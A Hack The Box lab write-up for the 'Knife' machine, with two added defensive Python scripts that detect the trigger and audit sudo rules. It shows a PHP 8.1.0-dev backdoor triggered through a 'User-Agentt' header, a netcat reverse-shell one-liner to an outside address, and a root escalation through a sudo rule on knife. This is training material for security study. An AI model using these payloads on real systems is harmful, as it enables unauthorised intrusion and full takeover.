
Hack The Box - Knife

 ·  ☕ 5 min read  ·  ✍️ c1sco0

Knife is a HackTheBox machine. On it we find a development version of PHP that was affected by a backdoor; through that backdoor we get in by executing a reverse shell. Finally we escalate privileges using the sudo permissions on the knife tool with a Ruby script.

Name: Knife
OS: Linux
Points: 20
Difficulty: Easy
IP: 10.10.10.242
Maker: MrKN16H7


Recon

NMAP

A port scan with nmap shows the http (80) and ssh (22) ports open.

# Nmap 7.91 scan initiated Wed May 26 19:44:57 2021 as: nmap -Pn -sV -sC -p22,80 -oN scan_ports 10.10.10.242
Nmap scan report for 10.10.10.242 (10.10.10.242)
Host is up (0.098s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
|   256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
|_  256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title:  Emergent Medical Idea
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed May 26 19:45:11 2021 -- 1 IP address (1 host up) scanned in 13.39 seconds

HTTP

We find an apparently static page.
[image: screenshot of the landing page]

GOBUSTER

We use gobuster to search for directories and files, but it only shows one address we already know and another that we cannot access remotely.

π ~/htb/knife ❯ gobuster dir -u http://10.10.10.242/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -q -t 30 -x php,html,txt,json,xml
/index.php            (Status: 200) [Size: 5815]
/server-status        (Status: 403) [Size: 277]

HEADERS

In the site's headers we find PHP/8.1.0-dev. Researching this version we find an exploit that allows command execution through a header; it is related to a backdoor recently detected in a commit to the PHP development repository, which allows commands to be executed remotely.

HTTP/1.1 200 OK
Date: Thu, 27 May 2021 00:22:54 GMT
Server: Apache/2.4.41 (Ubuntu)
X-Powered-By: PHP/8.1.0-dev
Content-Type: text/html; charset=UTF-8

USER - JAMES

Command execution happens after sending a command in the header User-Agentt: zerodiumsystem('whoami');, which executes commands and shows their output. In the curl output we see the whoami command executed as the user "james".

π ~/htb/knife ❯ curl -s http://10.10.10.242/ -H "User-Agentt: zerodiumsystem('whoami');"| html2text
james
    * About EMA
    * /
    * Patients
    * /
    * Hospitals
    * /
    * Providers
    * /
    * E-MSO

***** At EMA we're taking care to a whole new level . . . *****
****** Taking care of our  ******
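As an added defender-side example (not part of the original writeup), the following Python checker recognises the two indicators this section relies on: the X-Powered-By: PHP/8.1.0-dev banner in responses, and a User-Agentt request header whose value contains the string zerodium, which is what the backdoored build keyed on. The sample HTTP messages are constructed.

```python
"""Detection helper for the PHP 8.1.0-dev backdoor indicators seen on Knife.
Added example with constructed sample traffic; not code from the original writeup."""
import re

# The backdoored php-src commit evaluated PHP from a request header named
# "User-Agentt" whenever its value contained the string "zerodium"; affected
# builds advertise themselves as PHP/8.1.0-dev in X-Powered-By.
TRIGGER_HEADER = "user-agentt"
TRIGGER_MARKER = "zerodium"
VULN_BANNER = re.compile(r"^PHP/8\.1\.0-dev\b", re.IGNORECASE)


def parse_headers(raw: str) -> dict:
    """Split a raw HTTP message into a lower-cased {name: value} dict (start line skipped)."""
    headers = {}
    for line in raw.split("\r\n")[1:]:
        if not line:  # the empty line ends the header section
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers


def is_backdoor_trigger(raw_request: str) -> bool:
    """True if the request carries the backdoor activation header."""
    return TRIGGER_MARKER in parse_headers(raw_request).get(TRIGGER_HEADER, "")


def has_vulnerable_banner(raw_response: str) -> bool:
    """True if the server advertises the backdoored dev build."""
    banner = parse_headers(raw_response).get("x-powered-by", "")
    return bool(VULN_BANNER.match(banner))


# Constructed samples: a benign request, one carrying the trigger, and a response banner.
BENIGN_REQUEST = "GET / HTTP/1.1\r\nHost: 10.10.10.242\r\nUser-Agent: curl/7.76.1\r\n\r\n"
TRIGGER_REQUEST = (
    "GET / HTTP/1.1\r\nHost: 10.10.10.242\r\n"
    "User-Agentt: zerodiumsystem('whoami');\r\n\r\n"
)
DEV_RESPONSE = (
    "HTTP/1.1 200 OK\r\nServer: Apache/2.4.41 (Ubuntu)\r\n"
    "X-Powered-By: PHP/8.1.0-dev\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n"
)

if __name__ == "__main__":
    for label, req in (("benign", BENIGN_REQUEST), ("trigger", TRIGGER_REQUEST)):
        print(f"{label}: backdoor trigger = {is_backdoor_trigger(req)}")
    print(f"response: vulnerable banner = {has_vulnerable_banner(DEV_RESPONSE)}")
```

The same check can be run over captured proxy or WAF logs that retain full request headers, since Apache's default access log does not record custom headers.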

We run a reverse shell and obtain a shell and the user.txt flag.

# rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 8081 >/tmp/f
james@knife:/$ whoami
whoami
james
james@knife:/$ cd
cd
james@knife:~$ ll
ll
total 40
drwxr-xr-x 5 james james 4096 May 18 13:20 ./
drwxr-xr-x 3 root  root  4096 May  6 14:44 ../
lrwxrwxrwx 1 james james    9 May 10 16:23 .bash_history -> /dev/null
-rw-r--r-- 1 james james  220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 james james 3771 Feb 25  2020 .bashrc
drwx------ 2 james james 4096 May  6 14:45 .cache/
drwxrwxr-x 3 james james 4096 May  6 16:32 .local/
-rw-r--r-- 1 james james  807 Feb 25  2020 .profile
-rw-rw-r-- 1 james james   66 May  7 14:16 .selected_editor
drwx------ 2 james james 4096 May 18 13:20 .ssh/
-r-------- 1 james james   33 May 26 20:25 user.txt
james@knife:~$ cat user.txt
cat user.txt
7b3e1804cce95710f8730ca6fb1a086f
james@knife:~$

PRIVILEGE ESCALATION

Running sudo -l -l we see that we have root (sudo) permissions to run the knife command.

james@knife:~$ sudo -l -l
Matching Defaults entries for james on knife:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User james may run the following commands on knife:

Sudoers entry:
    RunAsUsers: root
    Options: !authenticate
    Commands:
	/usr/bin/knife
james@knife:~$ file /usr/bin/knife
/usr/bin/knife: symbolic link to /opt/chef-workstation/bin/knife
james@knife:~$ file /opt/chef-workstation/bin/knife
/opt/chef-workstation/bin/knife: a /opt/chef-workstation/embedded/bin/ruby --disable-gems script, ASCII text executable
james@knife:~$ ls -lah /opt/chef-workstation/bin/knife
-rwxr-xr-x 1 root root 12K Feb 15 22:06 /opt/chef-workstation/bin/knife
james@knife:~$

We use knife exec with a script to obtain a root shell and the root.txt flag.

james@knife:~$ echo "system('/bin/bash')" > script.rb
james@knife:~$ cat script.rb
system('/bin/bash')
james@knife:~$ sudo /usr/bin/knife exec script.rb
root@knife:/home/james# whoami
root
root@knife:/home/james# id
uid=0(root) gid=0(root) groups=0(root)
root@knife:/home/james# cd
root@knife:~# ll
total 56
drwx------  7 root root 4096 May 18 13:26 ./
drwxr-xr-x 20 root root 4096 May 18 13:25 ../
lrwxrwxrwx  1 root root    9 May  8 16:43 .bash_history -> /dev/null
-rw-r--r--  1 root root 3137 May  7 11:12 .bashrc
drwx------  2 root root 4096 May  7 14:47 .cache/
drwx------  3 root root 4096 May 18 13:20 .chef/
-rwxr-xr-x  1 root root  105 May  8 16:46 delete.sh*
drwxr-xr-x  3 root root 4096 May  7 11:13 .local/
-rw-r--r--  1 root root  161 Dec  5  2019 .profile
-rw-------  1 root root 1024 May  8 11:13 .rnd
-r--------  1 root root   33 May 26 20:25 root.txt
-rw-r--r--  1 root root   66 May  8 16:46 .selected_editor
drwxr-xr-x  3 root root 4096 May  6 14:44 snap/
drwx------  2 root root 4096 May  6 14:44 .ssh/
-rw-------  1 root root 2413 May 18 13:25 .viminfo
root@knife:~# cat root.txt
e2eee2ca199ac8ea06e9578969576706
root@knife:~#
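An added example, not from the writeup: a Python audit helper that parses the long-format sudo -l -l listing and flags root rules that skip authentication on tools able to run arbitrary code, which is what makes the knife rule above a root shell. The listing it parses is a constructed copy of the one shown; the list of code-running tools is an assumption.

```python
"""Audit helper for 'sudo -l -l' output: flags password-less root rules on tools
that evaluate scripts (the knife exec case). Added example, not from the writeup."""
import os
import re

# Assumed list of tools whose sub-commands run arbitrary code; a root rule for them is a root shell.
CODE_RUNNERS = {"knife", "ruby", "python3", "perl", "bash", "sh", "vim", "less"}


def parse_sudo_entries(output: str) -> list:
    """Parse long-format (-l -l) listing into dicts of run-as users, options and commands."""
    entries = []
    for block in re.split(r"^Sudoers entry:\s*$", output, flags=re.M)[1:]:
        entry, in_commands = {"runas": [], "options": [], "commands": []}, False
        for line in (l.strip() for l in block.splitlines() if l.strip()):
            if line.startswith("RunAsUsers:"):
                entry["runas"] = [u.strip() for u in line.split(":", 1)[1].split(",")]
            elif line.startswith("Options:"):
                entry["options"] = [o.strip() for o in line.split(":", 1)[1].split(",")]
            elif line == "Commands:":
                in_commands = True
            elif in_commands:
                entry["commands"].append(line)
        entries.append(entry)
    return entries


def risky_entries(entries: list) -> list:
    """Return (command, reason) pairs for root rules on code-running tools."""
    findings = []
    for e in entries:
        if not {"root", "ALL"} & set(e["runas"]):
            continue
        no_auth = "!authenticate" in e["options"]  # NOPASSWD in sudoers syntax
        for cmd in e["commands"]:
            if os.path.basename(cmd.split()[0]) in CODE_RUNNERS:
                findings.append((cmd, "code-running tool" + (", no password" if no_auth else "")))
    return findings


# Constructed sample mirroring the Knife listing (one rule).
SAMPLE = """User james may run the following commands on knife:

Sudoers entry:
    RunAsUsers: root
    Options: !authenticate
    Commands:
\t/usr/bin/knife
"""
```

Run it as `risky_entries(parse_sudo_entries(SAMPLE))`; on a real host feed it the captured output of sudo -l -l for each account being reviewed.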
Written by c1sco0 (Pentester wannabe)